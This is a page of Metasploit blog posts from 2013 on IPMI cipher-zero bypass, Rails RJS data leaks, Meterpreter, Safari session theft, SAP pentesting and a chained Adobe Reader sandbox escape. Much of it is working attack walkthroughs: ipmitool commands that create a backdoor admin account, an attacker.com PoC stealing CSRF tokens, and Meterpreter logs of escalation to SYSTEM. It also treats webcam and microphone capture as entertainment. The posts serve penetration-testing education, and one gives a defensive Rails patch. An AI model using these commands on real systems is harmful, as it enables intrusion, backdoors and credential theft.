Skip navigation
All Places > Metasploit > Blog
15 16 17 18 19 Previous Next

Metasploit

691 posts

This post is the sixth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements in the Metasploit Framework over the course of 2013.

 

This year, infosec superstars Dan Farmer and HD Moore have been making an impressive effort to spread the warnings around the Baseboard Management Controllers (BMCs), used to provide remote management capabilities for servers and installed in nearly all servers manufactured today, and the Intelligent Platform Management Interface (IPMI), the server management protocol running on the BMC. Dan Farmer published a paper on IPMI and BMC security, disclosing several issues found while reviewing the security of the IPMI network protocol that uses UDP port 623. HD put together a set of methods and Metasploit modules available to exploit various of the issues with IPMI. The issues allow IPMI anonymous authentication due to default credentials, retrieve password hashes, and bypass authentication on IPMI 2.0 with the use of cipher type 0.


Let me remind you how to exploit the "Cipher 0" issue because it is nifty! You can just use the ipmi_cipher_zero module to identify systems that have cipher 0 enabled:


  
$ msfconsole
 
       =[ metasploit v4.7.0-dev [core:4.7 api:1.0]
+ -- --=[ 1119 exploits - 638 auxiliary - 179 post
+ -- --=[ 309 payloads - 30 encoders - 8 nops
 
msf> use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf auxiliary(ipmi_cipher_zero) > set RHOSTS 10.0.0.0/24
msf auxiliary(ipmi_cipher_zero) > run
[*] Sending IPMI requests to 10.0.0.0->10.0.0.255 (256 hosts)
[+] 10.0.0.99:623 VULNERABLE: Accepted a session open request for cipher zero
[+] 10.0.0.132:623 VULNERABLE: Accepted a session open request for cipher zero
[+] 10.0.0.141:623 VULNERABLE: Accepted a session open request for cipher zero
[+] 10.0.0.153:623 VULNERABLE: Accepted a session open request for cipher zero


And then use the standard "ipmitool" command-line interface and a valid username to create a backdoor account:


  
$ ipmitool -I lanplus -H 10.0.0.99 -U Administrator -P FluffyWabbit user list
Error: Unable to establish IPMI v2 / RMCP+ session
Get User Access command failed (channel 14, user 1)
 
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user list
ID  Name         Callin  Link Auth    IPMI Msg   Channel Priv Limit
1   Administrator    true    false      true       ADMINISTRATOR
2   (Empty User)     true    false      false      NO ACCESS
 
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user set name 2 hdm
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user set password 2 password
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user priv 2 4
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user enable 2
 
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user list
ID  Name         Callin  Link Auth    IPMI Msg   Channel Priv Limit
1   Administrator    true    false      true       ADMINISTRATOR
2   hdm              true    false      true       ADMINISTRATOR
 
$ ssh hdm@10.0.0.99
hdm@10.0.0.99's password: password
 
User:hdm logged-in to ILOMXQ3469216(10.0.0.99)
iLO 4 Advanced Evaluation 1.13 at  Nov 08 2012
Server Name: host is unnamed
Server Power: On
 
</>hpiLO->

 

Simple and powerful! Remember, at the time of release Dan and HD found 53,000 IPMI 2.0 systems vulnerable to password bypass due to Cipher 0. If you haven't done so already, you might consider starting the year reviewing the FAQ about the BMC and IPMI research, Dan's paper, and HD Moore's penetration tester's guide!!

 

Not having enough with this research, later this same year HD Moore published the results of a security analysis on the Supermicro IPMI firmware, used in the baseboard management controller (BMC) of many Supermicro motherboards. In this analysis HD found usage of static encryption keys, hardcoded credentials, and several issues on the web management interface, including overflows, of course!

 

Exploiting memory corruption on these ARM-based embedded devices is really a challenging exercise which includes emulation, live exploitation, and keeping a lot of assembly in your head! If you would like to dig into the details, we published a journey into the exploiting too!

 

All in all, an impressive body of research which is worth to check carefully. In the meantime, I'm pretty sure these heavyweights will be working on more and awesome stuff... can't wait until see what 2014 offers the security community!

This post is the fifth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements in the Metasploit Framework over the course of 2013.

Several weeks ago, Egor Homakov wrote a blog post pointing out a common info leak vulnerability in many Rails apps that utilize Remote JavaScript. The attack vector and implications can be hard to wrap your head around, so in this post I'll explain how the vulnerability occurs and how to exploit it.

What is Remote Javascript?

Remote JavaScript (RJS) was a pattern prescribed by Rails < 2 to implement dynamic web sites. In RJS the user-facing parts of a website (HTML and JS) act as a "dumb client" for the server: when dynamic action is needed, the client calls a JavaScript helper that sends a request to the server. The server then performs the necessary logic and generates and responds with JavaScript code, which is sent back to the client and eval()'d.

The RJS approach has some advantages, as rails creator dhh points out in a recent blog post. However, suffice it to say that RJS breaks down as soon as you need complex client-side code, and a server API that responds with UI-dependent JavaScript is not very reusable. So Rails mostly has moved away from the RJS approach (JSON APIs and client-heavy stacks are the new direction), but still supports RJS out of the box.

So what's the problem?

Unfortunately, RJS is insecure by default. Imagine a developer on a Rails app that uses RJS is asked to make an Ajax-based login pop-up page. Following the RJS pattern, the developer would write some JavaScript that, when the "Login" link is clicked, asks the remote server what to do. The developer would add a controller action to the Rails app that responds with the JavaScript required to show the login form:

class Dashboard
  def login_form
    respond_to do |format|
      format.js do
        render :partial => 'show_login_form'
      end
    end
  end
end

Following the RJS pattern, the show_login_form.js.erb partial returns some JavaScript code to update the login form container:

$("#login").show().html("<%= escape_javascript(render :partial => 'login/form')")

Which, when rendered, produces code such as:

$("#login").show().html("
  <form action='/login' method='POST'
>
  <input type='hidden' name='auth_token' value='XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'>
  <table>
      <tr>
          <td>Name</td>
          <td><input type='text'></td>
      </tr>
      <tr>
          <td>Password</td>
          <td><input type='password'></td>
      </tr>
  </table>
</input>")

Now imagine user Tom is logged into the Rails app (which we'll say is served from railsapp.com). An unrelated website attacker.com might serve Tom the following code:

<html>
  <body>
    <script src='https://railsapp.com/dashboard/login.js'></script>
  </body>
</html>

Because <script> tags are allowed to be cross-origin (this is useful for CDNs), Tom's browser happily sends a GET request to railsapp.com, attaching his railsapp.com cookie. The RJS script is generated and returned to Tom, and his browser executes it. By stubbing out the necessary functions in the global scope, attacker.com can easily gain access to the string of HTML that is sent back:

<html>
  <body>
    <script>
      function $() {
        return {
          show: function() {
            return {
              html: function(str) {
                alert(str);
              }
            };
          }
        };
      }
    </script>
    <script src='http://railsapp.com/dashboard/login.js'></script>
  </body>
</html>

And now attacker.com can easily parse out Tom's CSRF auth token and start issuing malicious CSRF requests to railsapp.com. This means that attacker.com can submit any form in railsapp.com. The same technique can be used to leak other information besides auth token, including logged-in status, account name, etc.

As a pentester, how can I spot this bug while auditing a web app?

It is pretty easy to find this vulnerability. Click around a while in the web app and keep Web Inspector's Network tab open. Look for .js requests sent sometime after a page load. Any response to a .js request that includes private info (auth token, user ID, existence of a login session) can be "hijacked" using an exploit similar to the above PoC.

How can I fix this in my web app?

The fix prescribed by Rails is to go through your code and add request.xhr? checks to every controller action that uses RJS. This is annoying, and is a big pain if you have a large existing code base that needs patching. Since Metasploit Pro was affected by the vulnerability, we needed a patch quick. So I present our solution to the vulnerability - we now check all .js requests to ensure that the REFERER header is present and correct. The only downside here is that your app will break for users behind proxies that strip referers. Additionally, this patch will not work for you if you plan on serving cross-domain JavaScript (e.g. for a hosted JavaScript SDK). If you can stomach that sacrifice, here is a Rails initializer that fixes the security hole. Drop it in ui/config/initializers of your Rails app:

# This patch adds a before_filter to all controllers that prevents xdomain
# .js requests from being rendered successfully.

module RemoteJavascriptRefererCheck
  extend ActiveSupport::Concern

  included do
    require 'uri'
    before_filter :check_rjs_referer, :if => ->(controller) { controller.request.format.js? }
  end

  # prevent generated rjs scripts from being exfiltrated by remote sites
  # see http://homakov.blogspot.com/2013/11/rjs-leaking-vulnerability-in-multiple.html
  def check_rjs_referer
    referer_uri = begin
      URI.parse(request.env["HTTP_REFERER"])
    rescue URI::InvalidURIError
      nil
    end

    # if request comes from a cross domain document
    if referer_uri.blank? or
      (request.host.present? and referer_uri.host != request.host) or
      (request.port.present? and referer_uri.port != request.port)

      head :unauthorized
    end
  end
end

# shove the check into the base controller so it gets hit on every route
ApplicationController.class_eval do
  include RemoteJavascriptRefererCheck
end

And your server will now return a 500 error to any RJS request that does not contain the correct REFERER. A gist is available here, just download and place in $RAILS_ROOT/config/initializers.

This post is the fourth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements in the Metasploit Framework over the course of 2013.


Every year during a major holiday, we crawl out from our own bat cave and actually spend time with our family and friends. People start asking you what you do for a living? You respond with something you probably regret like "I am a penetration tester.", because to an average person your job title probably sounds no different than a porn star, or that you can start a fire with your thoughts. After some clarification, they kind of grasp of what you do - apparently you do something magical with them computers. And then the inevitable happens: Your ma and pa, brothers and sisters, your uncle, and even the neighbor come to you and ask you to fix their computers, maybe do a demonstration like blowing up a computer like the movie "Live Free or Die Hard" they just saw.

 

Let's face it, you are your family computer wizard, and it's time to put your skills into "good use" like fixing their computers, and get them educated about the risks of accepting candy from strangers on the Internet. If you're a little overwhelmed, fear no more, because with Metasploit in hand you can do ANYTHING... well, almost anything. Here's a few common tricks that we actually find practical during a family reunion:

 

Lost File, Please Recover!

 

Metasploit has two extremely handy data recovery tools you can use. The first one is post/windows/gather/forensics/recovery_files.rb, brought to you by Borja Merino. The other is post/windows/gather/forensics/imager.rb, by Wesley McGrew.

 

The recovery_files module basically tries to recover files that got recently deleted. Borja already made a video while making the module, so we'll let the video do the talking:

 

Screen Shot 2013-12-25 at 2.49.15 PM.png

 

The imager module functions a little bit like the dd command in Unix, except this is for Windows due to the use of Windows API (railgun). It will perform a byte-for-byte imaging of remote disks and volumes. Byte-for-byte obviously can be a time consuming task, so we advice leaving this option last.

 

What's the wireless password again?

 

Say everybody comes home for the holiday, and they've brought in all kinds of gadgets (XBOX One, Kindle Reader, laptops, smart phones, etc). Hey ma, what's the Wifi password? Your parents might not actually know the answer to that, and they blame the technician who set up the network months ago... or was it years ago? Your mission: to find the wifi password.

 

You can most likely do this by physically connecting to the wireless router and reset the password that way. Or on your parent's laptop, you can try the post/windows/wlan/wlan_profile post module to see if you can extract the passphrase from the keyMaterial element in the wifi profile.

 

Forgotten Administrator Password?

 

Sometimes it's almost impossible for a regular human being to not forget a password, like your family. The most common way is to reset it locally, often probably with a bootable disk (depends on the system). However, it is also possible to simply escalate privileges with whatever user account you have, and go from there. The most basic way is by using the "getsystem" command in meterpreter. If that doesn't work, you can try to pick a local exploit module like ppr_flatten_rec:

 

msf exploit(handler) > run

[*] Started reverse handler on 10.0.1.76:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 10.0.1.91
[*] Meterpreter session 2 opened (10.0.1.76:4444 -> 10.0.1.91:49159) at 2013-12-25 16:30:04 -0600

meterpreter > getuid
Server username: WIN-6NH0Q8CJQVM\sinn3r
meterpreter > background
[*] Backgrounding session 2...

msf exploit(handler) > use exploit/windows/local/ppr_flatten_rec 

msf exploit(ppr_flatten_rec) > set session 2
session => 2
msf exploit(ppr_flatten_rec) > run

[*] Started reverse handler on 10.0.1.76:4444 
[*] Launching notepad to host the exploit...
[+] Process 3784 launched.
[*] Reflectively injecting the exploit DLL into 3784...
[*] Injecting exploit into 3784 ...
[*] Exploit injected. Injecting payload into 3784...
[*] Payload injected. Executing exploit...
[*] Exploit thread executing (can take a while to run), waiting 10 sec ...
[*] Sending stage (769024 bytes) to 10.0.1.91
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 3 opened (10.0.1.76:4444 -> 10.0.1.91:49160) at 2013-12-25 16:31:32 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

 

If you actually managed to escalate privileges, do them a favor and run a system update too while you're at it :-)

 

 

Hollywood Hacking for Entertainment

 

We haven't figured out how to remotely blow up a computer, but here's a few modules that make hacking easy to understand and fun. Surprisingly, kids love playing with these :

 

Screen Shot 2013-12-25 at 3.07.00 PM.png

Webcam manipulation

 

Controlling webcam is pretty much a standard in Hollywood hacking, and you can do that with Metasploit too. Modules such as post/windows/manage/webcam or post/osx/manage/webcam; or the webcam_snap meterpreter command are great for this . It's not as awesome as Chatroulette like the one to the left though :-)

 

Microphone manipulation

 

Metasploit is also capable of audio recording. You can use the post/osx/manage/record_mic module, or post/multi/manage/record_mic.

 

Video Broadcasting

 

And of course, who can pass on the opportunity of rickrolling everybody on a holiday?

 

There are also plenty of Metasploit modules you can use for entertainment purposes, we encourage all of you to browser around our post module directory tree. But if you don't see anything you like, you can always file a feature request on Redmine and let us know. Or please feel free to submit your own :-)

 

As always, remember to run that msfupdate command to make sure you are up to date with Metasploit. For those of you who are new to Metasploit, you can download a copy here, and may the force be with you.

This post is the third in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements in the Metasploit Framework over the course of 2013.

 

Over the last quarter of 2013, we here in the Democratic Freehold of Metasploit found that we needed to modernize our flagship remote access toolkit (RAT), Meterpreter. That started with cleaving Meterpreter out of the main Metasploit repository and setting it up with its own repository, and then bringing in a dedicated Meterpreter hacker, the indomitable OJ TheColonial Reeves. We couldn't be happier with the results so far.

 

OJ has kindly written up an extensive report of what all he's worked on with Meterpreter and post-exploitation on Windows hosts over on his blog. I encourage you to head on over there and read his 3 Months of Meterpreter. For bullet points, the TL;DR is:

 

  • A Sane Build Environment

The biggest complaint we used to get about Meterpreter is the pain and suffering one had to go through just to build the darn thing. OJ has reworked all that from soup to nuts, and now Meterpreter builds cleanly and easily using Microsoft Visual Studio Express. If this is your complaint as well, please take a look at the README and amaze at the single 'make' command to kick things off.

 

  • Rock Solid Stability

Sometimes, Meterpreter would crash out on the target, often for mysterious reasons. No longer! OJ tackled pretty much all of the outstanding bugs having to do with Meterpreter stability, and it's better than ever now.

 

clipboard.png

  • Securification

Metasploit bread-and-butter exploits tend to be classic stack buffer overflows... so after a code audit, we've patched up all the obvious paths to remote code execution with Meterpreter. While we haven't proven exploitability with the old Meterpreter, we're pretty confident today that you won't get your sessions jacked out from under you by a rival pen-tester. Note, if you're able to successfully subvert a Meterpreter installation, we'd sure appreciate a Metasploit module proving it...

 

  • Enhanced Local Exploits

We've moved the KiTrap0D exploit out of the path for 'getsystem', and promoted it to a proper local exploit for privilege escalation; this has the result of making 'getsystem' procedures a lot more stable in the usual cases, leaving it to the penetration tester to decide if she wants to explore additional avenues of escalating to system privileges. Thanks to the submodule-ing of Stephen Fewer's ReflectiveDLLInjection strategy, we've also refactored the ppr_flatten_rec exploit to be a lot more reliable, as well.

 

  • Bunches of New Features

Along the way with making existing Meterpreter functionality more reliable and easier to use, we've added two heaping handfuls of new functionality; better IPv6 support, refreshed Incognito and mimikatz implementations, more robust environment variable enumeration, a new "Extended API" extension (which incidentally provides a nice roadmap on how to write Meterpreter extensions in general), a framework for interrogating ADSI, and so much more.

 

  • Readable Documentation

Finally, Meterpreter ships with inline, automatically generated documentation using Doxygen, a pretty standard syntax for annotation-based docs. Since you can easily generate the latest docs locally, you no longer have to rely on (or get mislead by) outdated API docs when hacking on Meterpreter.

 

Again, there's tons of details on all this in OJ's post, so if this kind of thing excites you, feel free to roll up your sleeves and dive into Meterpreter's guts. Payload integration in general is kind of what puts the "meta" in Metasploit -- having all this available to exploit developers and penetration testers should make security R&D move long much faster and cleaner, and get you from proof-of-concept to functional shells in real world situations with less time and effort.

 

Happy haXmas!

This post is the second in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements in the Metasploit Framework over the course of 2013.


If you are reading this blog post, I reckon you are somewhat a geeky security person, and you use some sort of application like KeyPass, Keychain, LastPass, etc, to manage your passwords. After all, we all know too well password stealing is a major security issue, and sometimes this is more than enough to get you to all kinds of wonderful places like the domain controller, the CEO's laptop, and all the goodies along the way. It also makes my heart die a little (in a good way, I guess?) when I hear professional penetration testers compromising the entire network by just stealing passwords, reuse or pass-the-hash and all that, while we spend intense amount of time building awesome exploits that they don't actually have to use. I mean, come on, man! :-) But of course, Metasploit creates more than just exploits, it covers the whole offensive package, so password stealing is definitely always on the menu.

 

Recently, I came across an article from SecureList about the discovery of Apple Safari storing session states un-encrypted. The "ah-ha, jackpot!" moment kicked in because stuff like this is such an easy win, and I decided to take a look. The problem is simple: So Apple Safari has this feature that allows you to reopen all the windows from last session with a click on a button, and the magic behind that is by storing these session states in a file named LastSession.plist. This is a binary property list that can be manually converted into a more human readable format by using the built-in plutil command in OS X, and then your session data can be found encoded in Base64. And you don't really have to be a computer genius to decode this, there are tools available online, just let me google that for ya.

 

And yes, I also just described how to write that module. I have been told the best crackers in the world can write this under 60 minutes, but fortunately I've already written it for you, so you can steal this under 60 seconds. Woohoo!

 

Another eye-candy thing is the researcher of the discovery (Mr. Vyacheslav Zakorzhevsky) demonstrated stealing a Gmail credential with the flaw, his screenshot is this:

safari_loophole_01.png

Look closely, and you'll see words like "Email=kaspersky_login&Passwd=kaspersky_passwd", "application/x-www-form-urlencoded", "accounts.google.com"... yeah, those are quite lovely. In case you're curious where this data is from, you can simply find it in Google's login form, specifically at https://accounts.google.com/ServiceLogin, I hope you like HTML:

 

Screen Shot 2013-12-25 at 12.44.12 AM.png

 

To trigger Safari storing your session data, here's an example of how to do that safely in case you want to test it yourself:

 

  1. Go to https://accounts.google.com/ServiceLogin
  2. Enter an invalid username and password, click "Sign In"
  3. Google should tell you the credential is bad, now press refresh.

 

And now that session state should be stored in ~/Library/Safari/LastSession.plist. If you're lazy like me, you can just run Metasploit's post/osx/gather/safari_lastsession module:

 

Screen Shot 2013-12-25 at 12.39.08 AM.png

 

The above test was conducted against Apple Safari version 7.0.1 (9537.73.11) on OS X 10.9.1. Yes, it is the latest version of Safari. Yes, someone did say this was patched in Safari 6.1, except not really. We've already informed the appropriate party to verify this patch information, and I'm sure this will be resolved shortly. Meanwhile, if you are a Safari user, please do this:

 

  1. Open Safari
  2. On your top left corner, click on "Safari" -> "Preferences"
  3. Click on the "Privacy" tab, and you should see the following - I want you to click that "Remove All Website Data" button real hard and make sure your LastSession.plist is cleared:

 

Screen Shot 2013-12-25 at 2.23.35 AM.png

 

Last but not least, if you're still wondering if LastSession.plist is still storing some sensitive data, you can always run the Metasploit module and test it out yourself. Metasploit can be downloaded here if you're new to the game. If you are already a Metasploit user, please make sure to run the msfupdate and that baby will be yours.

 

Oh, and if you do actually extract some username/password, remember to clear your ~/.msf4/loot/ directory. Because the username/password (in plain text) will be stored there, too. The post module should tell you precisely where this file is.

This post is the first in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements in the Metasploit Framework over the course of 2013.

 

This year 2013 disclosure of a banking Trojan modified to look for SAP GUI installations has harisen. A concerning sign that SAP system hacking has gone into mainstream cybercrime.  Once a domain of a few isolated APT attacks, SAP appears to be in the crosshairs of hackers that know just how much sensitive data ERP systems house.  With more than 248,500 customers in 188 countries, SAP may see an increase of attacks and their customers face the threat of data theft, fraud and sabotage.

 

This trend is not really surprising, given that financial, customer, employee and production data reside in a company’s enterprise resource planning (ERP) systems—and they are juicy targets for all sorts of malicious hackers. What’s worse, these systems have often organically grown over decades and are so complex that few people understand their organization’s entire ecosystem, let alone some of SAP’s protocols and components that are not publicly documented. This year, we've made significant effort to make of Metasploit a better SAP pentesting platform, due in a large part to an awesome community we should thank again! (and again, and again...). Because of their awesome work, now there are more than 50 SAP related modules into the framework. So, if you meet some of these guys, stop them and say thank you!

 

 

Thanks to all of them, the most important SAP infrastructure components are now covered by Metasploit, including:

 

  • DIAG/RFC communications, with support for the nwrfc wrapper on the Q Metasploit Repository.
  • The SAP Router.
  • The SAP Management Console.
  • The SAP Internet Communication Manager and the SAP Internet Communication Framework.
  • The J2EE Engine.

 

Not only code has been added to Metasploit. All of these capabilities, and how to use them have been covered on a free research paper which you can download here: “SAP Penetration Testing Using Metasploit - How to Protect Sensitive ERP Data”. And we have published several webcasts where you can learn more about SAP exploitation with Metasploit from the authors:

 

 

So, there are no excuses to not take into account SAP infrastructures when planning the 2014's pentest engagements. The tools are out there!

Recently, FireEye identified and shared information about two vulnerabilities used in the wild to exploit Adobe Reader on Windows XP SP3 systems. The vulnerabilities are:

 

  • CVE-2013-3346: An Use After Free on Adobe Reader. Specifically in the handling of a ToolButton object, which can be exploited through document's Javascript. This vulnerability is used to get remote code execution through a malicious PDF document. The code will be executed in a renderer process, inside the Adobe Reader sandbox if available.
  • CVE-2013-5065: A out of bounds array access on the Windows kernel driver ndproxy.sys. This vulnerability allows to escape the Adobe Reader sandbox so execution of processes and persistence can be easily achieved. As has been already disclosed, remember which the Routing and Remote Access service must be enabled in the target so the NDProxy driver will be available.

 

Metasploit already has modules available for both vulnerabilities:

 

 

In this blog post we're going to explain how to chain both modules to accomplish Adobe Reader Sandbox bypass like in the wild.

 

  • First of all, a session from a Reader renderer process is needed. In order to get it, the file format or the browser version of the adobe_toolbutton exploit can be used. In this example, the browser version is used:

 

  
msf > use exploit/windows/browser/adobe_toolbutton
msf exploit(adobe_toolbutton) > set SRVHOST 192.168.172.1
SRVHOST => 192.168.172.1
msf exploit(adobe_toolbutton) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_toolbutton) > set LHOST 192.168.172.1
LHOST => 192.168.172.1
msf exploit(adobe_toolbutton) > exploit
[ ] Exploit running as background job.

[ ] Started reverse handler on 192.168.172.1:4444 
[ ] Using URL: http://192.168.172.1:8080/vMrwTnexHFjnis
[ ] Server started.
msf exploit(adobe_toolbutton) > [*] 192.168.172.244  adobe_toolbutton - Gathering target information.
[ ] 192.168.172.244  adobe_toolbutton - request: /vMrwTnexHFjnis/SZLfWc/
[ ] 192.168.172.244  adobe_toolbutton - Sending PDF...
[ ] Sending stage (769024 bytes) to 192.168.172.244
[ ] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.244:1039) at 2013-12-17 16:10:55 -0600

msf exploit(adobe_toolbutton) > sessions -i 1
[ ] Starting interaction with 1...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

 

  • With this session shouldn't be possible to execute a new process, neither migrate to an existent process, because the Reader sandbox will prevent:

 

  
meterpreter > execute -f c:\\windows\\system32\\calc.exe
[-] stdapi_sys_process_execute: Operation failed: Access is denied.
meterpreter > ps -S AcroRd32|cmd
Filtering on process name...

Process List
============

 PID   PPID  Name          Arch  Session     User                           Path
 ---   ----  ----          ----  -------     ----                           ----
 3304  3128  AcroRd32.exe        4294967295                                 
 3336  3304  AcroRd32.exe  x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
 3824  1452  cmd.exe             4294967295                                 


meterpreter > migrate 3824
[*] Migrating from 3336 to 3824...
[-] Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insufficient privileges)

 

  • Here is where the ms_ndproxy local exploit comes to the rescue. Use it with the current session. Remember which the target process, at the moment, is inside the sandbox, so the exploit will elevate the current one (you can not execute a new process).

 

  
meterpreter > background
[*] Backgrounding session 1...
msf exploit(adobe_toolbutton) > use exploit/windows/local/ms_ndproxy
msf exploit(ms_ndproxy) > set SESSION 1
SESSION => 1
msf exploit(ms_ndproxy) > exploit

[*] Started reverse handler on 10.6.0.165:4444 
[*] Detecting the target system...
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\NDProxy found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x1
[*] Storing the IO Control buffer on memory...
[+] IO Control buffer successfully stored at 0xd0d0000
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful! Creating a new process and launching payload...
[!] Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...

 

  • So even when there isn't new session in this case, the original should belong to SYSTEM if the exploit has been successful:

 

  
msf exploit(ms_ndproxy) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

 

  • Even when we're still inside a sandboxed process, now we should available to migrate, and finally execute new processes:

 

  
meterpreter > execute -f c:\\windows\\system32\\calc.exe
[-] stdapi_sys_process_execute: Operation failed: Access is denied.
meterpreter > ps -S AcroRd32|cmd
Filtering on process name...

Process List
============

 PID   PPID  Name          Arch  Session  User                           Path
 ---   ----  ----          ----  -------  ----                           ----
 3304  3128  AcroRd32.exe  x86   0        JUAN-C0DE875735\Administrator  C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
 3336  3304  AcroRd32.exe  x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
 3824  1452  cmd.exe       x86   0        JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\cmd.exe


meterpreter > migrate 3824
[*] Migrating from 3336 to 3824...
[*] Migration completed successfully.
meterpreter > execute -f c:\\windows\\system32\\calc.exe
Process 2372 created.
meterpreter > ps -S calc
Filtering on process name...

Process List
============

 PID   PPID  Name      Arch  Session  User                           Path
 ---   ----  ----      ----  -------  ----                           ----
 2372  3824  calc.exe  x86   0        JUAN-C0DE875735\Administrator  c:\windows\system32\calc.exe


meterpreter > 

 

 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments

New Adobe Reader ROP Gadgets

This week, Juan Vazquez put together a neat one-two exploit punch that involves a somewhat recent Adobe Reader vulnerability (disclosed back in mid-May) and a sandbox escape via a OS privilege escalation bug. I won't give away the surprise there -- he'll have a blog post about it up in a few hours.  Part of the work, though, resulted in some new entries in Metasploit's RopDB; specifically, for Adobe Reader versions 9, 10, and 11.

 

If you're not already familiar with the RopDB that ships with Metasploit, you can brush up by reading Wei @_sinn3r Chen's write up about ROP chaining from way back in October, 2012, then follow up with his 2013 refresh.  Hopefully, these chains prove to be useful for exploit developers for a while, which should make turnaround for future (and recent past) Reader vulnerabilities quicker and easier.

 

YouTube Broadcasting

We have a fun module this week just in time for Xmas from Wei @_sinn3r Chen, the multi-platform YouTube broadcaster. To use it, simply point to a YouTube video ID (for example, XAg5KjnAhuU), fire it off on your compromised clients (Windows, Linux, or Mac), and amaze at the full-screen display of the video on your target's active desktops.

 

The most obvious use of such a module, of course, is for laughs, as you surprise your victims with sudden Rick Astley or Nyan Cat videos.  However, there is bona fide usefulness here, too. The real reason sinn3r popped this module out is that it makes for a great "payload" for a surprise training session. Imagine that you've kicked off a social engineering campaign against your own userbase, and you've gathered your sessions through straight user error (no exploits, no sneakiness, no nothing).  Now, instead of just handing off a report to your HR department head, you can also, on the spot, conduct some training on the compromised folks by immediately showing them what they did wrong.

 

It's super easy to record instructional videos and slap them up on YouTube; if you use YouTube's privacy settings to mark your video as 'unlisted', they won't get indexed, which makes them about as private as a limited-audience Gists or PasteBins. Not bad, and certainly easier than packing up a whole video payload or setting up your own streaming service.

 

To me, this seems like a pretty powerful mechanism to train naughty users into how to do the right thing. People get inurred to nastygrams from their IT and HR department really quickly, but a sudden 30 second video ad that tells them that what they just did was unsafe behavior can have a more immediate impact, especially if it's entertaining.

 

Finally, full-video post-exploit payloads are a hallmark of Hollywood hacking, as described in the original feature request, so this kind of thing can be really useful for regular training sessions or demos; who cares about passing hashes and dumping session credentials; show me funny cat videos and I'm sure to renew your engagement contract!

 

New Modules

Including those mentioned above, we've got eight new modules this week; six exploits, and two post modules. Four of the six exploits are client-side, which reminds me: Like every year now, we fully expect to see an avalanche of new out-of-the box laptops, desktops, phones, and tablets to hit the Internet Christmas morning. If you've been building out machines for your loved ones, do take a second to confirm that you've got your latest client-side patches all squared away before wrapping them up.

 

Exploit modules

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

SAP applications contain a ton of juicy information, making them a great target for malicious attackers who are after intellectual property, financial statements, credit card data, PII and PHI. Breaching SAP systems opens the door for fraud, sabotage, and industrial espionage.

 

SAP systems have often organically grown and are hard to update, making them a soft target. What's worse, pentesters are often unfamiliar with SAP infrastructures and how to pentest SAP systems. To help with the latter, Rapid7 is hosting some webcasts to introduce penetration testers to some of the key SAP infrastructure components.

 

This week, we're hosting two free webcasts for you to consider:

 

SAP Pentesting: From Zero 2 Hero with Metasploit

 

SAP Nmonkee.png

Dave Hartley aka @nmonkee has recently contributed a number of SAP modules to the Metasploit Framework. In this technical webinar for penetration testers, he is going to present a brief overview of how these modules can be used to go from Zero to Hero to achieve SAPpwnstar status when assessing or encountering SAP systems during engagements. The webcast will provide a very high level overview of common SAP system vulnerabilities and misconfigurations as well as demonstrating how the Metasploit Framework can be leveraged to quickly and easily exploit and compromise misconfigured/vulnerable SAP systems.

 

Dave is a Principal Security Consultant for MWR InfoSecurity and has been working in the IT Industry since 1998. Dave is a published author and has presented his research at several international respected security conferences such as 44CON, BSides, Sec-T, ZACON, DeepSec, T2 etc.

 

There are two showings for this webcast:

 

Become an SAP Pwn Star: Using Metasploit for ERP Security Assessments

 

sap-tod-juan.pngIn this technical webinar for penetration testers, Metasploit developers and security researchers Tod Beardsley and Juan Vazquez from the Metasploit team, give an introduction to SAP for penetration testers. The webcast introduces viewers to the most important components of SAP and gives an overview of Metasploit modules for SAP provided by community contributors. The webinar includes a live demo and time for Q&A.

 

